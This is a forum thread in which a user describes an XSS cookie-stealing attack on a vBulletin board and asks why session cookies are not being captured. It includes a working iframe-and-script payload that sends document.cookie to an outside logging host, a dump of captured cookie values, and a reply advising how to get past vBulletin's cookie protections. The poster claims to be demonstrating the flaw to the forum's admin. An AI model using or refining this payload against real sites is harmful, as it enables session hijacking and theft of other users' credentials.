Logging vBulletin session cookies

I've found an exploit on a vBulletin forum, I'm using an iframe to log the cookies…something like:

<iframe frameborder=0 src="" height=0 width=0 id="lol" name="lol"></iframe>
<script>
frames["lol"].location.href="http://www.xxxxxx.com/imagex/image.php?image=" + document.cookie;
</script>

So far so good, the strange thing is when I'm checking my cookie data file is that it doesn't log the bbpassword, userid and session hash…which basically sucks big time, the only stuff it logs is:

imagevbulletin_collapse=; IDstack=,24036,,42160,; __utma=188577343.2387310957089858000.1224555432.1237116882.1237133536.756; _utmz=188577343.1237076987.752.22.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=xxxxxxx; ebNewBandWidth.forum.xxxxxxxxxxxx.com=2826:1236415128565; __utmb=188577343.91.10.1237133536; bblastvisit=1237133941; bblastactivity=0;

However when I visit the phishing page myself I do get those cookies except the session hash…wtf is going on?

Sounds like your Phishing is not working :P

The iframe pass through must be dropping the cookie which is dependent in vB…look to me like a classic cookie code that stops stuff like this from happening. Do you know the vB backend code?

If you read into this code you will then be able to see where your problem is arising from so you can surpass this problem, perhaps even drop it as it may not work.

Just my thoughts though.

BTW: What are you gaining from this Phishing scheme? Account passwords? What good does that do you? You have an account there already…If you are looking to gain administrative rights, what is that going to do for you? Just wondering you motives to this "hack".

AldarHawk wrote: Sounds like your Phishing is not working :P

The iframe pass through must be dropping the cookie which is dependent in vB…look to me like a classic cookie code that stops stuff like this from happening. Do you know the vB backend code?

If you read into this code you will then be able to see where your problem is arising from so you can surpass this problem, perhaps even drop it as it may not work.

Just my thoughts though.

Thanks, I'll take a look at the vBulletin code, didn't know it was actually possible to filter cookies from output.

AldarHawk wrote: BTW: What are you gaining from this Phishing scheme? Account passwords? What good does that do you? You have an account there already…If you are looking to gain administrative rights, what is that going to do for you? Just wondering you motives to this "hack".

When I output the cookie with alert(), there are three interesting cookies(session hash, bbpassword(md5), userid). I'm not going to do anything harmful as I like the board and visit it very often, just want to show the admin why it's a bad idea to allow html on a public forum.;)

zomgwtfbbq wrote: When I output the cookie with alert(), there are three interesting cookies(session hash, bbpassword(md5), userid). I'm not going to do anything harmful as I like the board and visit it very often, just want to show the admin why it's a bad idea to allow html on a public forum.;)

Okay so this is a basic set up. It is not fully bad to allow HTML. It just needs to be filtered. sessionhash is nothing more than an SQL depsoit with the given "session" code. This relates to the bbpassword() and userid() information. with all three you can gain a lot but I am guessing this is already thought of from vBulletin :) Anywho, glad you are starting to learn from this zomg :P